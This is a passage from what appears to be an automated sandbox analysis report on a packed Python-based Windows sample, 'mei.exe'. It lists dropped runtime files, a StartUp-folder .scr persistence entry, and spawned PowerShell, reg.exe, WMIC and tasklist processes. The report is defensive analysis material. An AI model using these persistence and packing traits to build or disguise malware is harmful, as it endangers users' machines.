              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75EAD push rsp; iretd 1_2_00007FFDFAC75EAE
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75EBC push rsi; ret 1_2_00007FFDFAC75EBD
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75FB9 push r10; ret 1_2_00007FFDFAC75FCC
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC78DA5 push rsp; retf 1_2_00007FFDFAC78DA6
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC782C4 push rdi; iretd 1_2_00007FFDFAC782C6
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC7767B push r12; ret 1_2_00007FFDFAC776BF
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC78077 push r12; iretd 1_2_00007FFDFAC7808B
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC75F76 push r8; ret 1_2_00007FFDFAC75F83
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFDFAC7685F push rsi; ret 1_2_00007FFDFAC76896
              Source: C:\Users\user\Desktop\mei.exe Code function: 1_2_00007FFE00334541 push rcx; ret 1_2_00007FFE00334542
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9AA7D2A5 pushad ; iretd 9_2_00007FFD9AA7D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9AB985FD push ebx; ret 9_2_00007FFD9AB9860A
              Source: initial sample Static PE information: section name: UPX0
              Source: initial sample Static PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\mei.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Source: C:\Windows\System32\cmd.exe Process created: reg.exe
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-namedpipe-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-profile-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-2-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-string-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processenvironment-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-environment-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-fibers-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-process-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-2-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-string-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-stdio-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\unicodedata.pyd
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-math-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\libcrypto-3.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pyd
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-1.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-util-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-errorhandling-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-heap-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-rtlsupport-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\libssl-3.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-localization-l1-2-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\select.pyd
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\libffi-8.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-debug-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-sysinfo-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-convert-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-utility-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-locale-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-datetime-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-memory-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-console-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-conio-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-runtime-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\ucrtbase.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-filesystem-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\python311.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\sqlite3.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-heap-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-timezone-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-libraryloader-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-handle-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-time-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-interlocked-l1-1-0.dll
              Source: C:\Users\user\Desktop\mei.exe File created: C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l2-1-0.dll

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\mei.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Source: C:\Users\user\Desktop\mei.exe Code function: 0_2_00007FF6313D5190 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00007FF6313D5190
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
